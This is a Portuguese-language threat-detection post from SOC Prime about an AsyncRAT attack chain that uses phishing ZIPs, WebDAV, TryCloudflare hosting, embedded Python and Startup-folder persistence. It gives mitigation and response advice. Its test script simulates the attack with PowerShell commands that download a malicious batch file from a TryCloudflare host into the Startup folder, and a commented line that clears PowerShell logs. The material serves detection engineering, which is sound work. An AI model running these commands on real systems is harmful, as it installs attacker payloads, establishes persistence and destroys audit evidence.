SOC Prime Bias: Crítico

14 Jan 2026 15:04 UTC

Como a MDR Descobriu uma Cadeia de Ataque Multi-Estágio do AsyncRAT

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Como a MDR Descobriu uma Cadeia de Ataque Multi-Estágio do AsyncRAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O relatório descreve uma cadeia de intrusão em múltiplos estágios iniciada por e-mails de phishing que entregam iscas de ZIP com dupla extensão e transitam para uma sequência de payload hospedada via WebDAV. Os operadores abusam da infraestrutura gratuita da Cloudflare e de componentes Python incorporados para implantar o AsyncRAT nos endpoints das vítimas. A execução e persistência dependem de ferramentas nativas do Windows—Windows Script Host, PowerShell, e scripts batch—enquanto o estágio final utiliza injeção de código no explorer.exe. Ao direcionar a entrega e o preparo através de serviços em nuvem amplamente confiáveis, a atividade se mistura ao tráfego normal e pode evadir os controles perimetrais convencionais.

Investigação

Investigadores da Trend Micro relataram telemetria consistente com um fluxo de entrega escalonado: recuperação de um arquivo .pdf.zip do Dropbox, execução de atalhos .url embutidos, e subsequente interação com WebDAV atribuída a svchost.exe e rundll32.exe. A cadeia então implantou arquivos incorporados do Python 3.14.0, que foram usados para executar um script Python personalizado responsável pela injeção de shellcode do AsyncRAT via APC. A persistência foi alcançada colocando arquivos batch no diretório de Inicialização do usuário. Analistas também identificaram e correlacionaram múltiplos hosts TryCloudflare apoiando a infraestrutura.

Mitigação

Reduza a exposição treinando os usuários para tratar arquivos arquivados com dupla extensão e anexos ZIP inesperados como suspeitos e apertando o filtro para links em nuvem entregues via phishing. Bloqueie ou controle estritamente o acesso a serviços de tunelamento em nuvem não autorizados e monitore a dependência anormal de WebDAV em ambientes onde ele é incomum. Restrinja a execução de scripts a partir de diretórios graváveis pelo usuário e fortaleça os controles em torno do uso da pasta de Inicialização e criação de tarefas agendadas. Priorize detecções EDR/comportamentais que podem revelar cadeias de execução direcionadas por scripts e técnicas de injeção de código que miram em processos benignos.

Resposta

Se a atividade for detectada, isole o endpoint e pare os processos suspeitos associados à cadeia (notadamente svchost.exe, rundll32.exe e python.exe quando vinculados ao incidente). Remova a persistência deletando artefatos maliciosos batch do diretório de Inicialização, erradique os arquivos Python baixados e quaisquer componentes AsyncRAT, e realize uma varredura forense completa para arquivos adicionais de preparo e movimento lateral. Atualize os controles de rede e listas de bloqueio para incluir os domínios TryCloudflare identificados e qualquer infraestrutura associada observada durante a triagem.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Check de Pré‑Voo de Telemetria e Linha de Base deve ter passado.

  • Narrativa do Ataque & Comandos

    Um adversário que conseguiu acesso inicial ao PowerShell em um host Windows comprometido deseja configurar um ambiente de execução Python e alcançar persistência. Eles:

    1. Fazem download da distribuição Python incorporada diretamente para o local Temp do usuário usando Invoke‑WebRequest.
    2. Fazem download de um script batch malicioso (ahke.bat) de um domínio proxy da Cloudflare para a pasta de Inicialização do usuário para que ele execute em cada logon.
    3. Executam o zip do Python baixado (omitido aqui para brevidade) para executar payloads adicionais.

    Esses passos produzem exatamente as strings de comando correspondidas pela regra Sigma, gerando logs do bloco de script do PowerShell com o padrão iwr … -OutFile … .

  • Script de Teste de Regressão

    # -------------------------------------------------
    # Simulação em PowerShell da configuração do ambiente AsyncRAT
    # -------------------------------------------------
    
    # 1. Baixar zip Python incorporado para a pasta temp do usuário
    $pythonUrl = 'https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip'
    $pythonDest = "$env:USERPROFILEAppDataLocalTempp.zip"
    iwr $pythonUrl -OutFile $pythonDest
    
    # 2. Baixar arquivo batch malicioso para Inicialização para persistência
    $batUrl = 'https://plus-condos-thy-redeem.trycloudflare.com/ahke.bat'
    $batDest = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat"
    iwr $batUrl -OutFile $batDest
    
    # 3. (Opcional) Acionar execução do batch para demonstrar persistência
    # Start-Process -FilePath $batDest -WindowStyle Hidden
    # -------------------------------------------------
  • Comandos de Limpeza

    # Remover os artefatos baixados
    Remove-Item -Path "$env:USERPROFILEAppDataLocalTempp.zip" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat" -ErrorAction SilentlyContinue
    
    # Opcionalmente limpar logs de blocos de script do PowerShell (requer admin)
    # Clear-EventLog -LogName "Microsoft-Windows-PowerShell/Operational"